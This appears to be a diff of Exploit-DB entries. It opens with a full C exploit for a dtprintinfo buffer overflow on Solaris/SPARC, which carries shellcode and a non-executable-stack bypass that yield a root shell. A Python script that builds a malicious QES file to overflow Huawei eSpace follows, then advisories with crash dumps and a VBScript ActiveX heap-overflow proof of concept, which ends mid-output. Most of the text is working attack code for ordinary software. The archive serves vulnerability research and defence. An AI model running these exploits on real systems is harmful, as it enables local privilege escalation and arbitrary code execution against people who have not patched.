+ * raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC
+ * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. Many thanks to Dave Aitel for discovering this vulnerability
+ * and for his interesting research activities on Solaris/SPARC.
+ *
+ * "None of my dtprintinfo work is public, other than that 0day pack being
+ * leaked to all hell and back. It should all basically still work. Let's
+ * keep it that way, cool? :>" -- Dave Aitel
+ *
+ * This is the ret-into-ld.so version of raptor_dtprintname_sparc.c, able 
+ * to bypass the non-executable stack protection (noexec_user_stack=1 in 
+ * /etc/system).
+ *
+ * NOTE. If experiencing troubles with null-bytes inside the ld.so.1 memory 
+ * space, use sprintf() instead of strcpy() (tested on some Solaris 7 boxes).
+ *
+ * Usage:
+ * $ gcc raptor_dtprintname_sparc2.c -o raptor_dtprintname_sparc2 -ldl -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintname_sparc2 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=10(staff)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1
+ * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
+ * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10
+ * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]
+ */
+
+#include <dlfcn.h>
+#include <fcntl.h>
+#include <link.h>
+#include <procfs.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/systeminfo.h>
+
+#define INFO1	"raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC"
+#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
+#define	BUFSIZE	301				// size of the printer name
+#define	FFSIZE	64 + 1				// size of the fake frame
+#define	DUMMY	0xdeadbeef			// dummy memory address
+
+/* voodoo macros */
+#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
+#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}
+
+char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
+/* double setuid() */
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+/* execve() */
+"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
+"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
+"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	check_zero(int addr, char *pattern);
+int	search_ldso(char *sym);
+int	search_rwx_mem(void);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16];
+	char	platform[256], release[256], display[256];
+	int	i, offset, ff_addr, sc_addr, ret_pos, fpt_pos;
+	int	plat_len, prog_len, rel;
+
+	char	*arg[2] = {"foo", NULL};
+	int	arg_len = 4, arg_pos = 1;
+
+	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
+	int	ret = search_ldso("strcpy");	/* or sprintf */
+	int	rwx_mem = search_rwx_mem();
+
+	/* fake lpstat code */
+	if (!strcmp(argv[0], "lpstat")) {
+
+		/* check command line */
+		if (argc != 2)
+			exit(1);
+
+		/* get ret and fake frame addresses from environment */
+		ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
+		ff_addr = (int)strtoul(getenv("FPT"), (char **)NULL, 0);
+
+		/* prepare the evil printer name */
+		memset(buf, 'A', sizeof(buf));
+		buf[sizeof(buf) - 1] = 0x0;
+
+		/* fill with return and fake frame addresses */
+		for (i = 0; i < BUFSIZE; i += 4) {
+			/* apparently, we don't need to bruteforce */
+			set_val(buf, i, ret - 4);
+			set_val(buf, i += 4, ff_addr);
+		}
+
+		/* print the expected output and exit */
+		if(!strcmp(argv[1], "-v")) {
+			fprintf(stderr, "lpstat called with -v\n");
+			printf("device for %s: /dev/null\n", buf);
+		} else {
+			fprintf(stderr, "lpstat called with -d\n");
+			printf("system default destination: %s\n", buf);
+		}
+		exit(0);
+	}
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* get some system information */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+	rel = atoi(release + 2);
+
+	/* prepare the fake frame */
+	bzero(ff, sizeof(ff));
+
+	/*
+	 * saved %l registers
+	 */
+	set_val(ff, i  = 0, DUMMY);		/* %l0 */
+	set_val(ff, i += 4, DUMMY);		/* %l1 */
+	set_val(ff, i += 4, DUMMY);		/* %l2 */
+	set_val(ff, i += 4, DUMMY);		/* %l3 */
+	set_val(ff, i += 4, DUMMY);		/* %l4 */
+	set_val(ff, i += 4, DUMMY);		/* %l5 */
+	set_val(ff, i += 4, DUMMY);		/* %l6 */
+	set_val(ff, i += 4, DUMMY);		/* %l7 */
+
+	/*
+	 * saved %i registers
+	 */
+	set_val(ff, i += 4, rwx_mem);		/* %i0: 1st arg to strcpy() */
+	set_val(ff, i += 4, 0x42424242);	/* %i1: 2nd arg to strcpy() */
+	set_val(ff, i += 4, DUMMY);		/* %i2 */
+	set_val(ff, i += 4, DUMMY);		/* %i3 */
+	set_val(ff, i += 4, DUMMY);		/* %i4 */
+	set_val(ff, i += 4, DUMMY);		/* %i5 */
+	set_val(ff, i += 4, sb - 1000);		/* %i6: frame pointer */
+	set_val(ff, i += 4, rwx_mem - 8);	/* %i7: return address */
+
+	/* fill the envp, keeping padding */
+	sc_addr = add_env(ff);
+	add_env(sc);
+	ret_pos = env_pos;
+	add_env("RET=0x41414141");
+	fpt_pos = env_pos;
+	add_env("FPT=0x42424242");
+	add_env(display);
+	add_env("PATH=.:/usr/bin");
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the offset to argv[0] (voodoo magic) */
+	plat_len = strlen(platform) + 1;
+	prog_len = strlen(VULN) + 1;
+	offset = arg_len + env_len + plat_len + prog_len;
+	if (rel > 7)
+		VOODOO64(offset, arg_pos, env_pos)
+	else
+		VOODOO32(offset, plat_len, prog_len)
+
+	/* calculate the needed addresses */
+	ff_addr = sb - offset + arg_len;
+	sc_addr += ff_addr;
+
+	/* set fake frame's %i1 */
+	set_val(ff, 36, sc_addr);		/* 2nd arg to strcpy() */
+
+	/* overwrite RET and FPT env vars with the right addresses */
+	sprintf(ret_var, "RET=0x%x", ret);
+	env[ret_pos] = ret_var;
+	sprintf(fpt_var, "FPT=0x%x", ff_addr);
+	env[fpt_pos] = fpt_var;
+
+	/* create a symlink for the fake lpstat */
+	unlink("lpstat");
+	symlink(argv[0], "lpstat");
+
+	/* print some output */
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
+	fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
+	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return(env_len);
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return(env_len);
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+	    !(addr & 0xff000000)) {
+		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+		exit(1);
+	}
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+	int		addr;
+	void		*handle;
+	Link_map	*lm;
+
+	/* open the executable object file */
+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+		perror("dlopen");
+		exit(1);
+	}
+
+	/* get dynamic load information */
+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+		perror("dlinfo");
+		exit(1);
+	}
+
+	/* search for the address of the symbol */
+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
+		fprintf(stderr, "sorry, function %s() not found\n", sym);
+		exit(1);
+	}
+
+	/* close the executable object file */
+	dlclose(handle);
+
+	check_zero(addr - 4, sym);
+	return(addr);
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+	int	fd;
+	char	tmp[16];
+	prmap_t	map;
+	int	addr = 0, addr_old;
+
+	/* open the proc filesystem */
+	sprintf(tmp,"/proc/%d/map", (int)getpid());
+	if ((fd = open(tmp, O_RDONLY)) < 0) {
+		fprintf(stderr, "can't open %s\n", tmp);
+		exit(1);
+	}
+
+	/* search for the last RWX memory segment before stack (last - 1) */
+	while (read(fd, &map, sizeof(map)))
+		if (map.pr_vaddr)
+			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+				addr_old = addr;
+				addr = map.pr_vaddr;
+			}
+	close(fd);
+
+	/* add 4 to the exact address NULL bytes */
+	if (!(addr_old & 0xff))
+		addr_old |= 0x04;
+	if (!(addr_old & 0xff00))
+		addr_old |= 0x0400;
+
+	return(addr_old);
+}
+
+/*
+ * set_val(): copy a dword inside a buffer
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0xff000000) >> 24;
+	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 3] =	(val & 0x000000ff);
+}

exploits/windows/dos/46865.py

@@ -0,0 +1,200 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite
+#
+#
+# Vendor: Huawei Technologies Co., Ltd.
+# Product web page: https://www.huawei.com
+# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290
+# Affected module: cenwpoll.dll 1.0.8.8
+# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe
+#
+# Product description:
+# --------------------
+# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of
+# products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides
+# users with easy and secure access to their service platform from any device, in any place, at any time.
+# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using
+# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.
+#
+# Vulnerability description:
+# --------------------------
+# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails
+# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when
+# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of
+# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
+#
+# Tested on:
+# ----------
+# OS Name: Microsoft Windows 7 Professional
+# OS Version: 6.1.7601 Service Pack 1 Build 7601
+# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz
+#
+# Vulnerability discovered by:
+# ----------------------------
+# Gjoko 'LiquidWorm' Krstic
+# Senior STTE
+# SCD-ERC
+# Munich, Germany
+# 26th of August (Tuesday), 2014
+#
+# PSIRT details:
+# --------------
+# Security advisory No.: Huawei-SA-20141217- espace
+# Initial release date: Dec 17, 2014
+# Vulnerability ID: HWPSIRT-2014-1151
+# CVE ID: CVE-2014-9415
+# Patched version: eSpace Meeting V100R001C03
+# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+# 
+#
+# ------------------------------------ WinDBG output ------------------------------------
+#
+# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045
+# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0         nv up ei pl zr na pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+# *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll
+# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll - 
+# cenwpoll!DllUnregisterServer+0xa59e:
+# 05790f3e 8178082c010000  cmp     dword ptr [eax+8],12Ch ds:0023:00000008=????????
+# 0:008> !exchain
+# 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
+# mcstub+10041 (00410041)
+# Invalid exception stack at 00410041
+# Instruction Address: 0x0000000005790f3e
+# 
+# Description: Exception Handler Chain Corrupted
+# Short Description: ExceptionHandlerCorrupted
+# Exploitability Classification: EXPLOITABLE
+# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)
+#
+# Corruption of the exception handler chain is considered exploitable
+#
+# 0:008> d ebp
+# 02fecd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd60  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 0:008> u ebp
+# 02fecd00 41              inc     ecx
+# 02fecd01 004100          add     byte ptr [ecx],al
+# 02fecd04 41              inc     ecx
+# 02fecd05 004100          add     byte ptr [ecx],al
+# 02fecd08 41              inc     ecx
+# 02fecd09 004100          add     byte ptr [ecx],al
+# 02fecd0c 41              inc     ecx
+# 02fecd0d 004100          add     byte ptr [ecx],al
+#
+# ------------------------------------ /WinDBG output ------------------------------------
+#
+#
+
+import sys, os, time
+
+os.system('title jterm')
+os.system('color f5')
+os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def usage():
+	print '''
+	+---------------------------------------------+
+	|  eSpace Meeting Stack Buffer Overflow Vuln  |
+	|                                             |
+	|         Vuln ID: HWPSIRT-2014-1151          |
+	|            CVE ID: CVE-2014-9415            |
+	+---------------------------------------------+
+	'''
+	if len(sys.argv) < 2:
+		print 'Usage: \n\n\t'+piton+' <OPTION>'
+		print '\nOPTION:\n'
+		print '\t0 - Create the evil PoC file.'
+		print '\t1 - Create the evil file, start the vulnerable application and crash it.'
+		print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n'
+		quit()
+
+usage()
+crash = sys.argv[1]
+
+dir = os.getcwd();
+file = "evilpoll.qes"
+header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x.....
+
+time.sleep(1)
+# Overwrite FS:[0] chain (\x43 = EIP)
+buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode)
+buffer += '\x00\x01\x00\x00\x00\x00\x00\x90'
+buffer += '\x85\xA9\xD7\x00\x01\x04\x00'
+buffer += 'TEST'+'\x01\x02\x05\x00'
+buffer += 'ANSW1'+'\x05\x00'
+buffer += 'ANSW2'
+
+poc = header + buffer
+bytes = len(poc)
+
+print '[+] Creating evil PoC file...'
+time.sleep(1)
+print '[+] Buffering:\n'
+time.sleep(1)
+
+index = 0
+while index < len(poc):
+	char = poc[index]
+	#print char,
+	sys.stdout.write(char)
+	time.sleep(10.0 / 1000.0)
+	index = index + 1
+
+try:
+	writeFile = open (file, 'w')
+	writeFile.write( poc )
+	writeFile.close()
+	time.sleep(1)
+	print '\n\n[+] File \"'+file+'\" successfully created!'
+	time.sleep(1)
+	print '[+] Location: "'+dir+'"'
+	print '[+] Wrote '+str(bytes)+' bytes.'
+except:
+	print '[-] Error while creating file!\n'
+
+if crash == '0':
+	print '\n\n[+] Done!\n'
+elif crash == '1':
+	print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n'
+	os.system('pause')
+	os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"')
+elif crash == '2':
+	print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n'
+	os.system('pause')
+	os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"')
+	print '\n[+] You should see something like this in WinDBG:'
+	print '''
+	0:000> d 0012e37c
+	0012e37c  42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00  B.B.C.C.D.D.D.D.
+	0012e38c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e39c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e3ac  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e3bc  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e3cc  44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00  D.D.D.D.D.D.N.e.
+	0012e3dc  77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00  w. .P.o.l.l.....
+	0012e3ec  c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00  ....V4x.p.......
+	0:000> !exchain
+	0012e37c: 00430043
+	Invalid exception stack at 00420042
+	'''
+else:
+	print '[+] Have a nice day! ^^\n'
+	quit()
+
+print '\n[+] Have a nice day! ^^\n'
+#os.system('color 07')

exploits/windows/dos/46867.txt

@@ -0,0 +1,130 @@
+Huawei eSpace Meeting Image File Format Handling Buffer Overflow Vulnerability
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: https://www.huawei.com
+Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+
+Summary: Create more convenient Enhanced Communications (EC) services for your
+enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
+voice, data, video, and service streams, and provides users with easy and secure
+access to their service platform from any device, in any place, at any time. The
+eSpace Meeting allows you to join meetings that support voice, data, and video
+functions using the PC client, the tablet client, or an IP phone, or in a meeting
+room with an MT deployed.
+
+Desc: eSpace Meeting conference whiteboard functionality is vulnerable to a buffer
+overflow issue when inserting known image file formats. Attackers can exploit this
+issue to execute arbitrary code within the context of the affected application.
+Failed exploit attempts will likely result in denial-of-service conditions.
+
+Vuln modules (no DEP/ASLR):
+C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll
+C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.dll
+
+Tested on: Microsoft Windows 7 Professional
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+
+23.09.2014
+
+Patched version: V100R001C03
+Vuln ID: HWPSIRT-2014-1156
+CVE ID: CVE-2014-9417
+Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+
+--
+
+
+Reference magic numbers (hex signature):
+
+JPG/JPEG - FF D8 FF
+BMP - 42 4D
+PNG - 89 50 4E 47 0D 0A 1A 0A
+
+0:024> g
+CClassMgrFrameWnd::OnKeyUp lParam = -1072758783Get config of string parameter:box, value: 
+(2110.2258): Unknown exception - code c0000002 (first chance)
+(2110.2258): Unknown exception - code c0000002 (first chance)
+(2110.1b08): C++ EH exception - code e06d7363 (first chance)
+(2110.1b08): C++ EH exception - code e06d7363 (!!! second chance !!!)
+eax=036de3f4 ebx=01709870 ecx=00000003 edx=00000000 esi=7c380edc edi=036de484
+eip=75ae812f esp=036de3f4 ebp=036de444 iopl=0         nv up ei pl nz ac po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - 
+KERNELBASE!RaiseException+0x54:
+75ae812f c9              leave
+0:008> d esp
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MSVCR71.dll - 
+036de3f4  63 73 6d e0 01 00 00 00-00 00 00 00 2f 81 ae 75  csm........./..u
+036de404  03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c  .... .....m.0.=|
+036de414  00 00 00 00 18 00 00 00-14 33 41 7c 60 e4 6d 03  .........3A|`.m.
+036de424  b3 16 34 7c 00 00 9c 01-00 00 00 00 b8 16 34 7c  ..4|..........4|
+036de434  44 4b 41 7c 98 e4 6d 03-70 98 70 01 98 98 70 01  DKA|..m.p.p...p.
+036de444  84 e4 6d 03 ed 9a 35 7c-63 73 6d e0 01 00 00 00  ..m...5|csm.....
+036de454  03 00 00 00 78 e4 6d 03-98 98 70 01 54 16 3d 7c  ....x.m...p.T.=|
+036de464  63 73 6d e0 01 00 00 00-00 00 00 00 00 00 00 00  csm.............
+0:008> d
+036de474  03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c  .... .....m.0.=|
+036de484  a8 e4 6d 03 5a 8b 3c 7c-98 e4 6d 03 30 82 3d 7c  ..m.Z.<|..m.0.=|
+036de494  54 2b fc ab 54 16 3d 7c-58 a9 71 01 01 00 00 00  T+..T.=|X.q.....
+036de4a4  70 16 3d 7c 3c e8 6d 03-e0 d9 b0 04 00 00 00 00  p.=|<.m.........
+036de4b4  66 13 af 04 54 2b fc ab-80 94 6f 01 3c e8 6d 03  f...T+....o.<.m.
+036de4c4  30 ed 6d 03 00 00 00 00-ec e4 6d 03 00 00 00 00  0.m.......m.....
+036de4d4  0b 00 00 00 00 00 00 00-41 41 41 41 41 41 41 41  ........AAAAAAAA
+036de4e4  41 41 41 41 41 41 41 41-28 00 00 00 41 41 00 00  AAAAAAAA(...AA..
+0:008> d
+036de4f4  41 41 00 00 41 41 41 41-00 00 00 00 54 2b fc ab  AA..AAAA....T+..
+036de504  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
+036de514  00 00 00 00 24 ed 6d 03-22 a0 af 76 43 f0 ed 63  ....$.m."..vC..c
+036de524  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
+036de534  30 ed 6d 03 45 76 58 06-42 4d 00 0d 41 41 41 41  0.m.EvX.BM..AAAA
+036de544  41 41 41 41 41 41 6d 03-3b 23 af 04 3c e8 6d 03  AAAAAAm.;#..<.m.
+036de554  80 94 6f 01 88 ef 6d 03-05 02 00 00 00 00 00 00  ..o...m.........
+036de564  73 00 70 00 84 f2 b0 04-00 00 00 00 00 00 00 00  s.p.............
+0:008> d
+036de574  42 4d 00 0d 41 41 41 41-41 41 41 41 41 41 41 41  BM..AAAAAAAAAAAA
+036de584  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de594  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5a4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5b4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5c4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5d4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5e4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+--
+
+PNG Decoder error msg:$s
+Invalid parameter passed to C runtime function.
+Invalid parameter passed to C runtime function.
+(1874.2274): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=015d8998 edx=00000000 esi=015d8ab8 edi=00000000
+eip=025f1b99 esp=032ccc88 ebp=032cd0c4 iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
+*** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll - 
+classmgr+0x11b99:
+025f1b99 8b9868060000    mov     ebx,dword ptr [eax+668h] ds:0023:00000668=????????
+
+--
+
+JPEG datastream contains no image
+Improper call to JPEG library in state 200
+(1f88.2768): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=a2afcfb5 edx=00000000 esi=0352e318 edi=000000cc
+eip=0491b035 esp=0352e2c8 ebp=0352ed30 iopl=0         nv up ei ng nz ac pe cy
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
+*** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL - 
+MiniGDIEx!DllUnregisterServer+0x2f95:
+0491b035 ff10            call    dword ptr [eax]      ds:0023:00000000=????????
+
+---
+
+PoC files:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46867.zip

exploits/windows/dos/46868.txt

@@ -0,0 +1,85 @@
+Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: https://www.huawei.com
+Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+                  eSpace UC V200R002C02
+
+Summary: Create more convenient Enhanced Communications (EC) services for your
+enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
+voice, data, video, and service streams, and provides users with easy and secure
+access to their service platform from any device, in any place, at any time. The
+eSpace Meeting allows you to join meetings that support voice, data, and video
+functions using the PC client, the tablet client, or an IP phone, or in a meeting
+room with an MT deployed.
+
+Desc: eSpace Meeting suffers from a heap-based memory overflow vulnerability when parsing
+large amount of bytes to the 'strNum' string parameter in GetNameyNum() in 'ContactsCtrl.dll'
+and 'strName' string parameter in SetUserInfo() in eSpaceStatusCtrl.dll library, resulting
+in heap memory corruption. An attacker can gain access to the system of the affected node
+and execute arbitrary code.
+
+Vuln ActiveX controls:
+C:\Program Files\eSpace-ecs\ContactsCtrl.dll
+C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll
+
+Tested on: Microsoft Windows 7 Professional
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+
+23.09.2014
+
+Patched version: V200R001C03
+Vuln ID: HWPSIRT-2014-1157
+CVE ID: CVE-2014-9418
+Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+
+--
+
+
+ContactsCtrl.dll PoC and debug output:
+
+<object classid='clsid:B53B93C2-6B0D-4D30-B46D-12F64E809B6D' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Program Files\eSpace-ecs\ContactsCtrl.dll"
+prototype  = "Function GetNameByNum ( ByVal strNum As String ) As String"
+memberName = "GetNameByNum"
+progid     = "ContactsCtrlLib.ContactWnd"
+argCount   = 1
+arg1=String(616400, "A")
+target.GetNameByNum arg1 
+
+0:000> d esi
